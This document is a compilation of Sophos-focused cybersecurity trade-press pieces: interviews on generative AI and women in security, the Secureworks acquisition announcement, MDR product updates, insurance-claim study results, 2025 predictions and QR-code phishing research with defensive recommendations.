How is generative AI being utilised to enhance cybersecurity measures today?
AI brings a wide variety of advantages to cybersecurity: automation, speed, scalability, enhanced detection, and generalisability. Without AI, rule-based systems need immense manual upkeep to handle the scale of modern threats. AI models can generalise by learning relationships between any number of potentially hundreds of features, while human analysts cannot write such complex rules. AI does, however, stand to introduce new threats as large language models take over automated systems.

What potential risks does generative AI introduce in the cybersecurity landscape, such as AI-driven cyberattacks?
For the most part, criminals are using AI for exclusively for social scams and the social aspects of traditional attacks. AI allows for accurate translation at scale, which dramatically increases the quality of social scams. It can also be used to create high-quality phishing emails that are indistinguishable from the real thing.

AI chatbots are also very useful for initiating conversations with potential victims and setting the hook. Once a victim has been captured, humans usually take over but can still use AI to help with translation and grammar. One additional area where AI might be useful is in assessing the value of large volumes of stolen data. Using AI a criminal might be quicker to identify high-value data and either sell it at a premium or use it as an extra pressure mechanism against the victim.

What ethical concerns arise when using generative AI in cybersecurity, and how can they be addressed?
In most applications there aren’t many ethical concerns. Clearly using AI to generate malicious code or to gather open source intelligence should be done with caution, but most cybersecurity applications don’t involve many ethical dilemmas.

What challenges do cybersecurity teams face when integrating generative AI tools into their workflows?
Two primary concerns come to mind. First is when you are using generative to help you write code you must do very thorough reviews to be sure you are not introducing vulnerabilities. Generative AI has been known to make up the names of libraries that don’t exist or recommend code snippets containing basic programming mistakes like allowing SQL injection attacks or buffer overflow attacks. Second, we must verify the outputs when it really matters. Frequently mild inaccuracies may not matter, but when in circumstances where it is of great importance, we have to double-check the outputs to ensure the accuracy of the results.

Are there any notable examples of generative AI successfully preventing or mitigating cyberattacks?
Not that I am aware of. Traditional machine learning and neural-network malware detection models prevent attacks around the clock, but I am not aware of generative AI being used in this way to date.

How do you see generative AI evolving in the cybersecurity domain over the next few years?
I think the real promise is in alert triage and language translation capabilities. Of course, these technologies are available now from ourselves and other vendors, but as these capabilities mature, they will become increasingly important for smart automation and aiding human analysts. We are also likely to see AI automation of bug discovery in code before it ships to customers preventing vulnerabilities and improved detection of targeted phishing attacks in email solutions.

What role does human oversight (HITL) play in ensuring generative AI systems are effectively managing cybersecurity threats?
This is critically important. The machines are excellent at processing vast amounts of data and helping make sense of it, but they lack intuition, creativity, and context. Humans can take this reduced flow of information and add that intelligence to achieve superior outcomes.

How can smaller organisations with limited budgets incorporate generative AI for cybersecurity?
Most smaller organisations will benefit from AI through its integration into their existing tools and through their service providers. Much of the efficiencies gained by smart applications of this technology will allow for more affordable services from security providers and easier to use tools.

What best practices would you recommend for implementing generative AI tools while minimising risks?
If using AI models hosted in public clouds or by service providers caution must be exercised to not process sensitive information using these tools. Risks can be minimised by choosing providers in countries with privacy laws in-line with your responsibilities, but caution should still be exercised. For the most sensitive types of information, it would be best to host it on-premise or in a private cloud instance that is not shared with other tenants.

Sally Adam, Senior Director, Solution Marketing at Sophos, said, “Every year, organisations spend huge amounts of money on their cybersecurity. By quantifying the impact of controls on the outcome of cyberattacks, this study enables them to focus their investments on the most cost-effective options. At the same time, insurers have a major influence on cybersecurity spending through the controls they require of organisations wishing to be covered and the discounts they offer when a given scheme is in place. This study enables them to encourage investments that can make a real difference to incident outcomes and the resulting claim amounts.”

The Sophos study reveals a dramatic difference in cyber insurance claims: organizations using MDR services claim a median compensation of just $75,000, a staggering 97.5% less than the $3 million median claimed by organizations relying solely on endpoint solutions. This means that endpoint-only users typically claim 40 times more in the event of an attack. The study attributes this significant reduction to the rapid threat detection and blocking capabilities of MDR services, which can effectively prevent extensive damage.

The study also highlights a clear benefit to combining EDR or XDR with endpoint solutions, as the average insurance claim for users of these tools is just $500,000, which is one-sixth of the $3 million average claim for those using only endpoint solutions.

The Sophos study indicates that the predictability of cyber insurance claims varies significantly depending on the security controls in place. Claims from organizations utilizing MDR services show the highest predictability, suggesting consistent and reliable threat mitigation. This is likely due to the 24/7 expert monitoring, investigation, and response that allows for swift action against threats at any time. Conversely, claims from users of EDR/XDR tools are the least predictable, implying that their effectiveness in preventing major damage heavily depends on the user’s expertise and speed of response.

The Sophos study also reveals significant differences in recovery times from ransomware attacks. Endpoint solution users average a 40-day recovery, while EDR/XDR users take the longest at 55 days. In stark contrast, organizations using MDR services recover the fastest, with an average downtime of just three days. These findings underscore MDR’s effectiveness in minimizing the impact of cyberattacks and highlight the less predictable recovery experiences associated with EDR/XDR tools, whose success is dependent on user expertise.

Adam concludes, “The research confirms what many people instinctively know: the type of security solution used has a significant impact on cyber insurance claims. Cyberattacks are inevitable, but defences are not. These results are a useful tool for organisations wishing to optimise their cyber defence and their return on investment in cybersecurity. They will also be useful for insurers looking to reduce their exposure and offer suitable policies to their customers.”

Can you share your journey into the security world? What inspired you to pursue a career in this field?
I may not have originally planned to enter the tech industry, but my years of experience have shown me the significant impact of my work on our customers. Tactical threat intelligence examines the behaviors and observables of an attack—such as actions, tools, and infrastructure—while strategic threat intelligence focuses on broader aspects, including motivations, targeting, and attribution.

Early in my career, I often felt hesitant, particularly as the only woman on my team. However, I quickly realized that expertise, not gender, defines success in this field. As cybersecurity continues to evolve at an unprecedented pace, new challenges and threats emerge daily, making adaptability and resilience essential. No two days are the same, and the dynamic nature of the industry offers endless opportunities for growth and innovation.

What were some of the biggest challenges you faced as a woman, and how did you overcome them?
The biggest challenge for women in technology often depends on their specific role, but a common obstacle is the lack of representation and female role models. While progress has been made in improving gender diversity, it can still be daunting to work in environments where leadership is predominantly male. Seeing few women in senior positions can make career advancement feel like an uphill battle.

However, the industry is becoming more inclusive through initiatives such as women-in-cybersecurity programs and technical workshops designed to support and upskill women. Expanding these efforts is crucial in creating a more accessible and equitable industry for future generations.

How do you describe your leadership style, and how has it evolved over time?
I would describe my leadership style as collaborative and adaptive. In cyber threat intelligence, no one person has all the answers, so I prioritize teamwork, knowledge-sharing, and empowering others to contribute their unique expertise. Over time, my leadership style has evolved as I’ve gained more experience and confidence. Early on, I focused a lot on proving myself, but I’ve learned that great leadership isn’t about having all the answers—it’s about creating space for others to grow and succeed.

What strategies do you use to motivate and empower your team?
I actively support and mentor women in cyber threat intelligence, helping them develop their skills and advance in the industry. Industry conferences provide a great platform to connect with and guide women new to the field. At Sophos, I take pride in our commitment to addressing the gender pay gap. Through comprehensive reviews, structured budgets, and sustainable processes, our HR and leadership teams ensure equitable pay and career growth opportunities for women in cybersecurity.

Have you had any mentors or role models who have significantly influenced your career? How did they impact your journey?
Sophos has an incredible internal resource group, Sophos Women in Tech (SWiT), dedicated to empowering women in technology. Through initiatives like addressing global gender pay gaps, promoting STEM education for young girls, and providing mentorship and training, SWiT helps women build confidence in key areas such as negotiation and leadership. Being part of such a network has reinforced the importance of mentorship and advocacy in advancing women in technology, shaping my own commitment to supporting others in the field.

What advice would you give to young women aspiring to enter the security world?
To young women entering cybersecurity, don’t be discouraged if you’re the only woman in the room. Your value is defined by your expertise, not your gender. While women remain underrepresented in the field, this is an opportunity to drive change, reshape industry culture, and pave the way for future generations. Focus on continuous learning and embrace the journey of growth. With time and experience, your insights and leadership will naturally evolve, positioning you to guide and inspire others in the field.

Can you highlight some of your proudest achievements in your career so far?
I have several proud achievements, but I think I am most proud of my recent security conference presentations. Last year, I was accepted with a colleague to speak at Black Hat USA 2024 in Las Vegas on a years-long investigation we had conducted on a Chinese state-sponsored cyber espionage campaign targeting a government organization in Southeast Asia. We presented to an audience of over 700 people and was received with high regard, and I definitely consider it one of the highlights of my career.

How do you manage work-life balance, and what tips do you have for other women striving to achieve this balance?
Managing work-life balance in cyber threat intelligence can be challenging, especially in a field where threats don’t adhere to a 9-to-5 schedule. For me, balance comes from setting clear boundaries and prioritizing self-care just as much as my work. I think one of the best things you can do for yourself is to have a hobby completely unrelated to work. Cybersecurity can be intense, and I find it important to have a creative outlet. I personally enjoy pottery, painting, and bowling as my weekly hobbies, which helps me reset my mind and prevent burnout.

With this acquisition, Sophos is now the leading pure-play cybersecurity provider of Managed Detection and Response (MDR) services, supporting more than 28,000 organizations of all sizes worldwide. The combination will enable Sophos to deliver an unparalleled security operations platform, featuring hundreds of built-in integrations for adaptive protection, detection and response for mitigating cyberattacks. The open and scalable platform helps organizations, especially those with diverse IT estates, safeguard current and future technology investments, providing greater operational efficiencies and return on cybersecurity spend. Sophos X-Ops is also expanding its threat intelligence and security services capabilities by adding the Secureworks Counter Threat Unit and security operations and advisory teams.

As a channel-first cybersecurity provider, Sophos remains unwavering in its commitment to delivering cutting-edge security services and technologies that empower our global community of resellers, Managed Service Providers (MSPs) and Managed Security Services Providers (MSSPs). This includes expanding their reach, enhancing operational scalability and providing stronger defences to the countless organizations that need the ability to effectively defend against today’s constant and complex cyberattacks.

“The market is embracing MDR as a clear means to deliver positive cybersecurity outcomes, and this has meant rapid growth in the category,” said Joe Levy, CEO, Sophos. “Sophos is differentiated by our very mature competencies in ransomware detection, malware analysis and threat actor tradecraft. These defences are further augmented by Sophos’ native artificial intelligence (AI), first innovated by our globally peer-recogniwed AI team nearly a decade ago, and embedded in our MDR, endpoint, network, email, and cloud security to more effectively neutralize and stop threats. With the integration of Secureworks, our expanded services and product portfolio will provide even stronger end-to-end security solutions that will include identity threat detection and response (ITDR), next-gen SIEM and managed risk, all in a single open platform. We will also be able to further advance our AI, threat intelligence and attack research through more diverse and deeper global telemetry that is analyst-tuned for the real world. At every level, we are very excited about this next accelerated chapter for Sophos.”

In the near term, Sophos and Secureworks are operating business as usual, working with our respective channel partners, MSPs and MSSPs worldwide to distribute our existing security services and technology. Both companies’ sales and customer experience groups will operate to support existing customers, assist with renewals and develop current and new business opportunities. Sophos protects more than 600,000 customers worldwide with its portfolio of MDR, endpoint, network, email, and cloud security solutions that integrate and adapt to provide real-time defence through the Sophos Central platform.

Under the terms of the agreement, Sophos acquired Secureworks in an all-cash transaction valued at approximately $859 million. Secureworks shareholders, including Dell Technologies, will receive $8.50 per share in cash. This represents a 28% premium to the unaffected 90-day volume-weighted average price (VWAP). Kirkland & Ellis LLP acted as legal counsel to Sophos, Goldman Sachs & Co. LLC., Barclays, BofA Securities, HSBC Securities (USA) Inc., and UBS Investment Bank acted as financial advisors and provided debt financing for the transaction. Piper Sandler & Company and Morgan Stanley & Co. LLC acted as financial advisors to Secureworks, and Paul, Weiss, Rifkind, Wharton & Garrison LLP acted as legal counsel.

Additionally, according to new Sophos X-Ops research, “Cybercriminals Still Not Getting on Board the AI Train (Yet),” released today, there has been a slight but noteworthy shift in how cybercriminals use AI. After investigating several underground forums, Sophos X-Ops found that, while there’s still scepticism about GenAI, some criminals are using it to automate mundane tasks, such as crafting bulk emails and analysing data. Others are incorporating it into spam and social engineering toolkits.

“As with many other things in life, the mantra should be ‘trust but verify’ regarding generative AI tools. We have not taught the machines to think; we have simply provided them with the context to speed up the processing of large quantities of data,” said Chester Wisniewski, director, global field CTO, Sophos. “The potential of these tools to accelerate security workloads is amazing, but it still requires the context and comprehension of their human overseers for this benefit to be realised.”

With some form of AI embedded in the cybersecurity infrastructure of 98% of organisations surveyed, IT leaders expressed concern about potential over-reliance on AI, with 87% of respondents stating they were concerned about a resulting lack of cybersecurity accountability. Different-sized organisations expressed different priorities for utilising GenAI.

While large organisations (those with more than 1,000 employees) are prioritising improved protection, respondents with 50-99 employees rated reducing burnout as their top desired benefit from GenAI tools. However, complicating matters, across all sizes of organisations, 84% of leaders surveyed said they were concerned about pressure to reduce cybersecurity professional headcount due to unrealistic expectations about AI’s abilities to replace human operators.

Other Key Findings from the “Beyond the Hype” Report:

1. Costs of GenAI Are Hard to Quantify: 75% of IT leaders agree that the costs of GenAI in cybersecurity products are hard to quantify.
2. Companies Are Counting on Savings from GenAI: While 80% of IT leaders believe that GenAI will significantly increase the cost of cybersecurity tools, most organisations believe GenAI offers a path to lowering overall cybersecurity expenditure with 87% of respondents believing the savings of GenAI will offset the costs.

Sophos MDR offers a comprehensive suite of capabilities that go beyond standard threat containment to include full-scale incident response, such as root cause analysis, the removal of malicious tools or artefacts used by attackers, and investigations across customers’ environments to ensure adversaries are fully ejected to prevent another attack. What further differentiates Sophos is that these incident response services are included with Sophos MDR on an unlimited basis, meaning customers are not additionally charged and there is no limit on the number of incident response hours. Sophos MDR Complete also includes a breach protection warranty covering up to $1 million in incident response expenses. Sophos provides flexibility for how customers can work with the MDR analysts, including the ability to pre-authorize them to contain an active threat.

Sophos has made significant investments into its MDR offering with increased analyst capacity, AI-assisted workflows, new features and expanded integrations to help deliver the best possible outcomes through improved protection, detection and investigation of threats. Sophos has added the following new features:

1. Proof of Value: New Sophos MDR service insights to explain the MDR team’s actions including highlighting the human hours spent threat hunting and creating and tuning detections. High-value dashboard enhancements include details of MITRE ATT&CK tactics uncovered in proactive threat hunts conducted by Sophos’ MDR team, MDR analyst coverage, case investigation summaries and an account health check status.
2. Enhanced Security for Microsoft Customers: New Sophos-proprietary detections for Microsoft Office 365 identify threats including business email compromise and adversary in the middle account takeover attacks, independent of the customer’s Microsoft license level.
3. Expanded Compatibility with Third Parties: This expanded ecosystem of turnkey integrations with third-party cybersecurity and IT tools includes a new Backup and Recovery integration category.
4. Proactive Vulnerability Mitigation: Sophos Managed Risk powered by Tenable provides attack surface vulnerability management as a new managed service option for Sophos MDR customers.
5. Efficiency and Automation: Sophos MDR has added AI-powered workflows to streamline operational processes and drive better security outcomes for our customers. This innovation delivers a reduced mean time to respond (MTTR) through more efficient triage, while also ensuring that all legitimate threats are rapidly investigated. This enables analysts to concentrate on other tasks such as threat hunting, account health monitoring and detection engineering.

“Attackers are continuously advancing their tactics to outmanoeuvre traditional security defences,” said Rob Harrison, senior vice president of product management at Sophos. “Our customers rely on Sophos MDR to help their organizations tackle today’s threats 24/7 with full-scale incident response to remove active adversaries and conduct root cause analysis to identify the underlying issues that led to an incident. We’re consistently evolving our solutions with new offerings and integrations, just like attackers are constantly evolving their tactics, so customers can disrupt threats before they escalate into destructive attacks.”

How did the industry and your company fare in 2024, and what were the key highlights?
One highlight in 2024 was the introduction of the “Secure by Design” initiative spearheaded by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), of which Sophos was a founding signatory. Getting technology vendors to improve the security and quality of their products from the start will have long-lasting improvements on our collective security.

Looking at the cybercrime scene, we saw continued attacks against supply chains that had widespread impacts. The most recent example, the ransomware attack against supply chain management company Blue Yonder, disrupted businesses globally. These kinds of attacks not only have amplified impacts but also increase the pressure on victim organizations to pay the extortionists.

What opportunities do you foresee for 2025, and how do you plan to leverage them?
While large language models (LLMs) have been a focal point in AI, we anticipate that their advancement will be incremental rather than revolutionary in 2025. Multi-modal AI systems will be increasingly used to defend against never-before-seen phishing and other social scams. These systems could become instrumental in both cybersecurity defence and cybercriminal attack strategies.

What major challenges did you encounter in 2024, and how did you address them?
In our latest Active Adversary report, we found that cybercriminals are increasingly hiding in plain sight on targets’ Windows networks by taking advantage of trusted Microsoft binaries. Between 2023 and the first half of 2024, abuse of trusted applications grew by 51%.

Understanding how attackers are abusing these living off-the-land binaries (LOLBins) enabled Sophos to continue adding detections for malicious and suspicious activities resulting from their use. These additional detections mean that defenders can detect attacker activity sooner and therefore respond quickly to nascent attacks before they become critical.

Which emerging technologies do you believe will be in high demand in 2025, and why?
In addition to multi-modal AI systems, incremental improvements in AI technologies, across all its different modalities, will continue to be in demand from all industries. General hardware improvements in the areas of processing, memory and storage will help fuel AI improvements and other technological breakthroughs. Hopefully, the widespread application of renewable energy technologies will also be in high demand to combat the devastating environmental impacts of AI and other energy-intensive technologies.

If you could give one piece of advice to businesses preparing for 2025, what would it be?
Regarding focus on cybersecurity practice, our suggestion to channel shall be to:

• Strengthen Endpoint Protection and Managed Detection & Response (MDR) Services as sophisticated malware and ransomware continue to be top threats in the META region, targeting both SMBs and large enterprises.
• Offer Cloud Security Solutions as Cloud adoption is accelerating in META, and partners must secure their customers’ data, applications, and infrastructure in the cloud.
• Educate and implement Zero Trust Network Access (ZTNA) and SASE frameworks for customers transitioning to hybrid work environments.
• Offer flexible subscription-based or pay-as-you-go cybersecurity solutions tailored to SMBs and startups as many organizations in the region face budget constraints but require enterprise-grade protection.
• Help customers comply with regional data protection regulations like GDPR, Saudi’s PDPL, or South Africa’s POPIA.
• Regulatory enforcement is becoming stricter, and organizations need expert guidance to avoid penalties.

What will be your primary focus areas and strategic priorities for 2025?
Below are the top 3 priorities for 2025 apart from enhancing our partner program:

1. Build Managed Services Capabilities (MSP) Priority: In 2025, we aspire to transition channel into offering Managed Services through the Sophos MSP Connect program.
2. Focus on Solution Bundling and Cross-Selling: we have created a 2025 plan to engage, and encourage partners to bundle Sophos solutions (e.g., endpoint, firewall, MDR, and cloud security) to maximize value per customer
3. Co-Marketing and Demand Generation: Our Marketing team shall engage with channels to drive demand through joint marketing campaigns and events for lead generation and market penetration.

How has the regional threat landscape evolved over the past few months?
The MENA region’s cybersecurity landscape is evolving, with governments placing greater emphasis on data privacy and protection regulations. Sophos is well-positioned to help organizations in the region meet these requirements through our cutting-edge solutions, including endpoint protection, firewalls, and managed services like MDR (Managed Detection and Response).

What are the five major cybersecurity predictions for the upcoming months?

1. Supply Chain Attacks – The Comeback Threat: One of the most disruptive cybersecurity events of the past year, the ransomware attack on CDK Global—a leading software provider for car dealerships—highlighted the broad-reaching impact of supply chain attacks. The incident, which disrupted thousands of U.S. car dealerships for over a week, is a stark reminder of the cascading consequences that such attacks can have on interconnected industries.
2. Ransomware Actors Pivot to Cloud Assets Amid Endpoint Security Gains: As organizations implement more advanced endpoint security tools, such as Sophos Endpoint Detection and Response (EDR) and Multi-Factor Authentication (MFA), attackers are increasingly targeting cloud environments, which are often less protected by MFA and other controls. With account access harder to compromise due to MFA, attackers are now exploiting cloud assets and authentication tokens to gain footholds
3. Cybercriminals Use Noise and Distraction Tactics to Disorient Defenders: To evade detection, cybercriminals are using distraction tactics to pull incident responders’ attention away from their primary objective. By creating “noise”—such as minor attacks or false incidents—attackers can overwhelm response teams, allowing larger threats to advance undetected.
4. Generative AI Lowers the Barrier for Cybercrime, Increasing Attack Volume: Generative AI platforms have made it easier for less-skilled attackers to create and launch credible cyberattacks. By using AI models to generate phishing emails, malware code, and other attack tools, novice attackers are flooding the digital landscape with new threats, creating a significant resource strain for defenders.
5. Fatigue and Burnout Among Cybersecurity Professionals Reach Critical Levels: Cybersecurity teams are grappling with increasing levels of burnout as they contend with complex and evolving threats, a shortage of skilled professionals, and rising expectations. The intense workload, coupled with continuous cyber incidents, is driving high attrition rates, with many seasoned professionals choosing to leave the field.

What are your plans for Black Hat MEA?
At Black Hat MEA, Sophos will showcase our latest advancements in cybersecurity, particularly focusing on how our solutions can support organizations in Saudi Arabia in their journey toward Vision 2030. One key area of emphasis was the Sophos Firewall, which offers robust network security with advanced threat protection, web filtering and secure VPN access, ensuring that businesses can protect their networks from even the most sophisticated attacks.

We will also highlight Sophos Managed Detection and Response (MDR), our comprehensive threat detection service that combines machine learning and expert human analysis. With MDR, our security team actively monitors, detects and responds to threats 24/7, allowing organisations to focus on their core business while maintaining a strong cybersecurity posture. By integrating Sophos Firewall and MDR, we provide end-to-end security coverage that aligns with the Kingdom’s strategic goals for a resilient and secure digital infrastructure.

Tell us about your regional commitment in terms of expanding reach through partnerships.
We work hand-in-hand with local partners and organizations to develop and implement strategies tailored to Saudi Arabia’s specific needs. Our regional presence ensures that businesses and government institutions receive the expertise and support required to stay ahead of emerging threats.

Because QR codes are not readable by computers, the employee must scan the QR code using their mobile phone. The QR code links to a phishing page, which the employee may not recognize as malicious since phones usually are less protected than computers. The goal of the attackers is to capture employees’ passwords and their multi-factor authentication (MFA) tokens to access a company’s system by bypassing the security measures in place.

“We spent a considerable amount of time sifting through all the spam samples we had to find examples of quishing,” comments Andrew Brandt, principal researcher at Sophos X-Ops. “Our research has revealed that attacks that exploit this specific threat vector are intensifying, both in terms of volume and sophistication, especially when it comes to the appearance of the PDF document.

In addition to social engineering tactics, the quality of emails, attachments and QR code graphics, these attacks seem to be growing in terms of organization as well. Indeed, some malicious actors now offer as-a-service tools to run phishing campaigns using fraudulent QR codes. In addition to features such as CAPTCHA bypasses or the generation of IP address proxies to bypass automated threat detection, these criminal organizations provide a sophisticated phishing platform that can capture the credentials or MFA tokens of targeted individuals.

To encourage organizations to better protect systems against this type of attack, Sophos X-Ops shares a list of recommendations:

1. Be vigilant about internal emails about HR topics, salaries or company benefits: Sophos X-Ops’ research has found that social engineering tricks exploit these themes to trick employees into scanning fraudulent QR codes from their mobile devices.
2. Monitor risky sign-ins: Using identity management tools, organizations can detect unusual sign-in activity.
3. Enable Conditional Access: This feature helps enforce access controls based on the user’s location, device status and risk.
4. Enable effective access monitoring thanks to sophisticated logs: this type of advanced monitoring allows you to better visualize all access to the system and detect this type of threat in time.
5. Implement advanced email filtering: There are QR code phishing protection solutions that detect fraudulent QR codes included directly in emails and plans to expand its solution to QR codes in attachments.
6. Encourage employees to be vigilant and report incidents: Prompt reporting of anomalies to the incident response team is essential to protect company systems from phishing.
7. Revoke suspicious user sessions: It is imperative to have a plan in place to revoke user access that shows signs of compromise.

Sophos’ experience and reputation as a leading provider of managed security services and end-to-end security products, combined with Secureworks’ security operations expertise transformed into the Taegis platform, is expected to further deliver complementary advanced MDR and XDR solutions for the benefit of their global customer bases. Together, they will help strengthen the resilience and security posture of global organizations of any size with a combination of security controls, AI, world-class threat intelligence, and two teams with decades of cybersecurity expertise.

Sophos expects to integrate solutions from both companies into a broader and stronger security portfolio benefiting small, mid, and enterprise customers. This includes Sophos expanding its current portfolio with other new offerings like identity detection and response (ITDR), next-gen SIEM capabilities, operational technology (OT) security, and enhanced vulnerability risk prioritization. As two partner-centric organizations, the combination of Sophos and Secureworks will enable the combined company to expand its market presence to create greater value within the channel and strengthen the overall security community.

“Secureworks offers an innovative, market-leading solution with their Taegis XDR platform. Combined with our security solutions and industry leadership in MDR, we will strengthen our collective position in the market and provide better outcomes for organizations of all sizes globally, said Joe Levy, CEO of Sophos. “Secureworks’ renowned expertise in cybersecurity perfectly aligns with our mission to protect businesses from cybercrime by delivering powerful and intuitive products and services. This acquisition represents a significant step forward in our commitment to building a safer digital future for all.”

Cyber risk continues to escalate, driven by a rampant cybercriminal ecosystem and global geopolitical pressures. Combined, Sophos and Secureworks share a long history of having exceptional threat intelligence, security operations, incident response, and innovative security product capabilities that help organizations defeat these adversaries.

“Our mission at Secureworks has always been to secure human progress. Sophos’ portfolio of leading endpoint, cloud, and network security solutions – in combination with our XDR-powered managed detection and response – is exactly what organizations are looking for to strengthen their security posture and collectively turn the tide against the adversary,” said Wendy Thomas, CEO, Secureworks. “As Joe and I both believe, this transaction will strengthen our go-to-market offering with Sophos’ global scale, expertise and reputation.”

Under the terms of the agreement, Sophos intends to acquire Secureworks in an all-cash transaction valued at $859 million. Secureworks shareholders, including Dell Technologies, will receive $8.50 per share in cash. This represents a 28% premium to the unaffected 90-day volume-weighted average price (VWAP). The transaction is expected to close in early 2025, subject to customary closing conditions. Additional information regarding this announcement can be found in the Form 8-K filed by Secureworks with the United States Securities and Exchange Commission (SEC) on Oct. 21, 2024.

Kirkland & Ellis LLP is acting as legal counsel to Sophos and Goldman Sachs & Co. LLC., Barclays, BofA Securities, HSBC Securities (USA) Inc. and UBS Investment Bank are acting as financial advisors and providing debt financing for the transaction. Piper Sandler & Company and Morgan Stanley & Co. LLC are acting as financial advisors to Secureworks and Paul, Weiss, Rifkind, Wharton & Garrison LLP are acting as legal counsel.